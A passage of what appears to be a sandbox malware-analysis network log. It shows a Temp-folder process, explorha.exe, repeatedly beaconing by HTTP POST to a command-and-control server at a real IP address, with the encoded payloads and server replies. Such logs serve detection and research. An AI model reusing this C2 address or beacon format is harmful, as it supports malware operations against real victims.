                                                                                                    Apr 19, 2024 04:26:45.405383110 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:45.651685953 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:45.653119087 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:45.903750896 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    50192.168.2.449786193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:46.264699936 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:46.509696960 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:46.510546923 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:46.760263920 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    51192.168.2.449787193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:47.110914946 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:47.358378887 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:47.359117985 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:47.611823082 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    52192.168.2.449788193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:47.971313000 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:48.220345974 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:48.222172022 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:48.475574017 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    53192.168.2.449789193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:48.827059984 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:49.074484110 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:49.075346947 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:49.327601910 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    54192.168.2.449790193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:49.688937902 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:49.936506033 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:49.937239885 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:50.188977003 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    55192.168.2.449791193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:50.544281960 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:50.787827969 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:50.790215969 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:51.037442923 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    56192.168.2.449792193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:51.389873981 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:51.635653973 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:51.636625051 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:51.898878098 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    57192.168.2.449793193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:52.251868963 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:52.499845982 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:52.500591040 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:52.752819061 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    58192.168.2.449794193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:53.113727093 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:53.364538908 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:53.365361929 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:53.620805979 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    59192.168.2.449795193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:53.999582052 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:54.249661922 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:54.527724028 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
